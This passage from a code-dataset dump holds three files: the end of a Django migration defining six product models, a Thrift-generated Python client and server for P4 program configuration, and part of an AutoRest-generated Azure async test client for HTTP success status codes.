('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
migrations.CreateModel(
name='ReviewProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
migrations.CreateModel(
name='ReviewProductOne',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
migrations.CreateModel(
name='TopProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
migrations.CreateModel(
name='TopProductOne',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('items_name', models.CharField(max_length=300)),
('price', models.TextField(max_length=50)),
('Description', models.TextField(blank=True, max_length=600)),
('Image', models.ImageField(upload_to='')),
],
),
]
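# The six CreateModel operations above duplicate an identical field set. In
# models.py (not in a migration module) that duplication is usually factored
# out with an abstract base model. An illustrative sketch, assuming the field
# names above; shown commented out because model classes must not be defined
# inside a migration module:
#
#     class ProductBase(models.Model):
#         items_name = models.CharField(max_length=300)
#         price = models.TextField(max_length=50)
#         Description = models.TextField(blank=True, max_length=600)
#         Image = models.ImageField(upload_to='')
#
#         class Meta:
#             abstract = True
#
#     class LatestProduct(ProductBase):
#         pass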
| [stats row for the file above: avg_line_length 43.027027, max_line_length 114, alphanum_fraction 0.551193, 73 lines, 3,184 bytes; remaining qsc_* quality-signal columns elided] |
| 913d643d59688620838cc48a10903e3717d70381 | 13,039 | py | Python | targets/simple_linker/lswitch_runtime/LinkerSwitch.py | hksoni/p4bricks | 0b2f4a1cbfe94d8cbbe7e04716c1b418f5f73204 | ["Apache-2.0"] | stars: 1 (2021-02-18) | issues: null | forks: null |
#
# Autogenerated by Thrift Compiler (0.9.2)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
    from thrift.protocol import fastbinary
except ImportError:
    fastbinary = None
class Iface:
def p4_program_config_add(self, program_name, config_str):
"""
Parameters:
- program_name
- config_str
"""
pass
def p4_program_config_delete(self, program_name):
"""
Parameters:
- program_name
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def p4_program_config_add(self, program_name, config_str):
"""
Parameters:
- program_name
- config_str
"""
self.send_p4_program_config_add(program_name, config_str)
return self.recv_p4_program_config_add()
def send_p4_program_config_add(self, program_name, config_str):
self._oprot.writeMessageBegin('p4_program_config_add', TMessageType.CALL, self._seqid)
args = p4_program_config_add_args()
args.program_name = program_name
args.config_str = config_str
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_p4_program_config_add(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = p4_program_config_add_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "p4_program_config_add failed: unknown result");
def p4_program_config_delete(self, program_name):
"""
Parameters:
- program_name
"""
self.send_p4_program_config_delete(program_name)
return self.recv_p4_program_config_delete()
def send_p4_program_config_delete(self, program_name):
self._oprot.writeMessageBegin('p4_program_config_delete', TMessageType.CALL, self._seqid)
args = p4_program_config_delete_args()
args.program_name = program_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_p4_program_config_delete(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = p4_program_config_delete_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "p4_program_config_delete failed: unknown result");
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["p4_program_config_add"] = Processor.process_p4_program_config_add
self._processMap["p4_program_config_delete"] = Processor.process_p4_program_config_delete
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_p4_program_config_add(self, seqid, iprot, oprot):
args = p4_program_config_add_args()
args.read(iprot)
iprot.readMessageEnd()
result = p4_program_config_add_result()
result.success = self._handler.p4_program_config_add(args.program_name, args.config_str)
oprot.writeMessageBegin("p4_program_config_add", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_p4_program_config_delete(self, seqid, iprot, oprot):
args = p4_program_config_delete_args()
args.read(iprot)
iprot.readMessageEnd()
result = p4_program_config_delete_result()
result.success = self._handler.p4_program_config_delete(args.program_name)
oprot.writeMessageBegin("p4_program_config_delete", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class p4_program_config_add_args:
"""
Attributes:
- program_name
- config_str
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'program_name', None, None, ), # 1
(2, TType.STRING, 'config_str', None, None, ), # 2
)
def __init__(self, program_name=None, config_str=None,):
self.program_name = program_name
self.config_str = config_str
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.program_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.config_str = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('p4_program_config_add_args')
if self.program_name is not None:
oprot.writeFieldBegin('program_name', TType.STRING, 1)
oprot.writeString(self.program_name)
oprot.writeFieldEnd()
if self.config_str is not None:
oprot.writeFieldBegin('config_str', TType.STRING, 2)
oprot.writeString(self.config_str)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.program_name)
value = (value * 31) ^ hash(self.config_str)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class p4_program_config_add_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('p4_program_config_add_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class p4_program_config_delete_args:
"""
Attributes:
- program_name
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'program_name', None, None, ), # 1
)
def __init__(self, program_name=None,):
self.program_name = program_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.program_name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('p4_program_config_delete_args')
if self.program_name is not None:
oprot.writeFieldBegin('program_name', TType.STRING, 1)
oprot.writeString(self.program_name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.program_name)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class p4_program_config_delete_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('p4_program_config_delete_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
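# --- Illustrative usage sketch (editor's addition, not generated code) ---
# Round-trips one of the generated structs through TBinaryProtocol over an
# in-memory transport; only the Thrift runtime modules this generated file
# already references (TTransport, TBinaryProtocol) are assumed.
def _example_round_trip():
    args = p4_program_config_delete_args(program_name='example.p4')  # hypothetical program name
    out_buf = TTransport.TMemoryBuffer()
    args.write(TBinaryProtocol.TBinaryProtocol(out_buf))
    parsed = p4_program_config_delete_args()
    parsed.read(TBinaryProtocol.TBinaryProtocol(TTransport.TMemoryBuffer(out_buf.getvalue())))
    assert parsed == args  # __eq__ above compares the structs field by field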
| 30.607981
| 188
| 0.689087
| 1,584
| 13,039
| 5.347854
| 0.09154
| 0.044623
| 0.074371
| 0.044623
| 0.859403
| 0.813599
| 0.786684
| 0.745721
| 0.715736
| 0.710778
| 0
| 0.010201
| 0.203083
| 13,039
| 425
| 189
| 30.68
| 0.805024
| 0.032825
| 0
| 0.774295
| 1
| 0
| 0.040697
| 0.023599
| 0
| 0
| 0
| 0
| 0
| 1
| 0.141066
| false
| 0.00627
| 0.018809
| 0.037618
| 0.30094
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0 | 8 |
hexsha: e6840d77600abe9dfe913678260e998c4ccbcc23
size: 35,401
ext: py
lang: Python
max_stars_repo_path: test/vanilla/legacy/Expected/AcceptanceTests/Http/httpinfrastructure/aio/operations/_http_success_operations.py
max_stars_repo_name: Azure/autorest.python
max_stars_repo_head_hexsha: c36f5c1a2d614a1eeba6fec6a2c02517f2d1cce7
max_stars_repo_licenses: ["MIT"]
max_stars_count: 35
max_stars_repo_stars_event_min_datetime: 2018-04-03T12:15:53.000Z
max_stars_repo_stars_event_max_datetime: 2022-03-11T14:03:34.000Z
max_issues_repo_path: test/vanilla/legacy/Expected/AcceptanceTests/Http/httpinfrastructure/aio/operations/_http_success_operations.py
max_issues_repo_name: Azure/autorest.python
max_issues_repo_head_hexsha: c36f5c1a2d614a1eeba6fec6a2c02517f2d1cce7
max_issues_repo_licenses: ["MIT"]
max_issues_count: 652
max_issues_repo_issues_event_min_datetime: 2017-08-28T22:44:41.000Z
max_issues_repo_issues_event_max_datetime: 2022-03-31T21:20:31.000Z
max_forks_repo_path: test/vanilla/legacy/Expected/AcceptanceTests/Http/httpinfrastructure/aio/operations/_http_success_operations.py
max_forks_repo_name: Azure/autorest.python
max_forks_repo_head_hexsha: c36f5c1a2d614a1eeba6fec6a2c02517f2d1cce7
max_forks_repo_licenses: ["MIT"]
max_forks_count: 29
max_forks_repo_forks_event_min_datetime: 2017-08-28T20:57:01.000Z
max_forks_repo_forks_event_max_datetime: 2022-03-11T14:03:38.000Z
content:
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._http_success_operations import (
build_delete200_request,
build_delete202_request,
build_delete204_request,
build_get200_request,
build_head200_request,
build_head204_request,
build_head404_request,
build_options200_request,
build_patch200_request,
build_patch202_request,
build_patch204_request,
build_post200_request,
build_post201_request,
build_post202_request,
build_post204_request,
build_put200_request,
build_put201_request,
build_put202_request,
build_put204_request,
)
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
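# Note (editor's addition): ClsType above is the shape of the optional 'cls' callback that
# every operation in this file accepts. The callback receives the raw PipelineResponse,
# the deserialized body (or None), and a dict of extra response values (always {} here);
# whatever it returns replaces the method's normal return value.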
class HttpSuccessOperations:
"""HttpSuccessOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~httpinfrastructure.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def head200(self, **kwargs: Any) -> None:
"""Return 200 status code if successful.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_head200_request(
template_url=self.head200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
head200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def get200(self, **kwargs: Any) -> bool:
"""Get 200 success.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: bool, or the result of cls(response)
:rtype: bool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[bool]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_get200_request(
template_url=self.get200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize("bool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get200.metadata = {"url": "/http/success/200"} # type: ignore
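# Example (editor's addition): with the 'cls' hook, a caller can observe the raw response
# as well as the deserialized body. 'ops' stands for any HttpSuccessOperations instance
# and is hypothetical here:
#     status_and_body = await ops.get200(
#         cls=lambda pipeline_response, body, headers: (pipeline_response.http_response.status_code, body))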
@distributed_trace_async
async def options200(self, **kwargs: Any) -> bool:
"""Options 200 success.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: bool, or the result of cls(response)
:rtype: bool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[bool]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_options200_request(
template_url=self.options200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize("bool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
options200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def put200(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Put boolean value true returning 200 success.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_put200_request(
content_type=content_type,
json=json,
template_url=self.put200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
put200.metadata = {"url": "/http/success/200"} # type: ignore
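# Note (editor's addition): the body-taking methods below all repeat the pattern above:
# boolean_value defaults to True and is serialized with self._serialize.body(..., "bool")
# only when it is not None, so passing boolean_value=None sends the request without a JSON body.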
@distributed_trace_async
async def patch200(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Patch true Boolean value in request returning 200.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_patch200_request(
content_type=content_type,
json=json,
template_url=self.patch200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
patch200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def post200(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Post bollean value true in request that returns a 200.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_post200_request(
content_type=content_type,
json=json,
template_url=self.post200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
post200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def delete200(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Delete simple boolean value true returns 200.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_delete200_request(
content_type=content_type,
json=json,
template_url=self.delete200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def put201(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Put true Boolean value in request returns 201.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_put201_request(
content_type=content_type,
json=json,
template_url=self.put201.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
put201.metadata = {"url": "/http/success/201"} # type: ignore
@distributed_trace_async
async def post201(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Post true Boolean value in request returns 201 (Created).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_post201_request(
content_type=content_type,
json=json,
template_url=self.post201.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
post201.metadata = {"url": "/http/success/201"} # type: ignore
@distributed_trace_async
async def put202(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Put true Boolean value in request returns 202 (Accepted).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_put202_request(
content_type=content_type,
json=json,
template_url=self.put202.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
put202.metadata = {"url": "/http/success/202"} # type: ignore
@distributed_trace_async
async def patch202(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Patch true Boolean value in request returns 202.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_patch202_request(
content_type=content_type,
json=json,
template_url=self.patch202.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
